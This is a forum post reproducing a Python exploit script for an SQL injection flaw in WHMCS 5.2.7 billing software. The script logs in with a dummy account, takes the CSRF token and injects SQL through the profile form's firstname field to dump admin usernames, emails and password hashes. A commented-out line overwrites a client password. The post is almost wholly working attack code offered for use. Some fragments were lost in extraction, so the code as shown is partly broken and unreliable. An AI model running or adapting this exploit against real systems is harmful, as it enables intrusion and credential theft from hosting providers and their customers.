FoxKids Posted October 19, 2013 Report Posted October 19, 2013 WHMCS 5.2.7 - SQL Injection Vulnerability# 2013/10/03 - WHMCS 5.2.7 SQL Injection# = '' # wopsie dopsieuser_email = 'mysuper@hacker.account' # just create a dummie account at /register.phpuser_pwd = 'hacker'import urllib, re, sysfrom urllib2 import Request, urlopenua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"def exploit(sql): print "Doing stuff: %s" % sql r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read() return'(id="firstname" value="(.*?)")', r).group(2)def login(): print "Getting CSRF token" r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua})) csrf ='(type="hidden" name="token" value="([0-9a-f]{40})")', cookie =['set-cookie'].split(';')[0] print "Logging in" r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read() if 'dologin.php' in r: sys.exit('Unable to login') else: return [cookie,'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]user = login()print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get adminsprint exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients# oh you want to be evil#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)#!/usr/bin/env python Quote